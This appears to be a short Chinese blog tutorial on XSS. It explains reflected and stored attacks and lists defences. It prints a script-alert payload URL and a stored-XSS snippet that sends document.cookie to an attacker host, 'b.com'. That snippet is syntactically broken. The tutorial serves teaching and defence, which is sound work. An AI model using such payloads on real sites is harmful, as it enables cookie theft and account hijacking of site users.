web安全

XSS攻击

XSS攻击,跨站脚本攻击,这是在网站中最容易产生的攻击。原理是攻击者向存在XSS漏洞的网站输入一段攻击性代码
可以分为反射性脚本攻击和存储型脚本攻击

反射性脚本攻击

1、例子
正常脚本

www.a.com?content=aaa

页面中的展示内容为

aaa

攻击脚本

www.a.com?content=<script>alert('aaa')</script>

点击攻击脚本后就会执行script脚本中的内容
2、这种脚本是需要用户点击带有攻击性链接后发生的,影响面一般比较小

存储型脚本攻击

1、例子
比如产品评价列表,用户新增评价,在评价中录入了攻击性脚本,保存后该攻击性脚本就保存到数据库中,每个拉取评价列表的用户都会拉取到这段攻击性代码
2、盗取cookie
正常网站的域名是a.com 攻击者服务器b.com
正常网站中有一个输入框

<input type="textarea" />

攻击者在输入框中输入的代码是

<script>
  var str=document.cookie;
  var a=document.createElement('a');
  a.href="b.com?cookie"=str;
  a.innerHtml="![](/aa.png)"
  document.body.append(a);
</script>

当用户拉取到代码之后,误操作点击了超谅解,就会导致本页面的cookie发送到攻击者代码

防范方法

XSS攻击的本质是太相信用户的输入,因此不要相信用户的输入,对输入进行过滤,就能够比较绝大多数的XSS攻击

  • 对代码进行encode编码
  • 对敏感cookie设置http-only
  • 表单数据规定输入值的类型
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容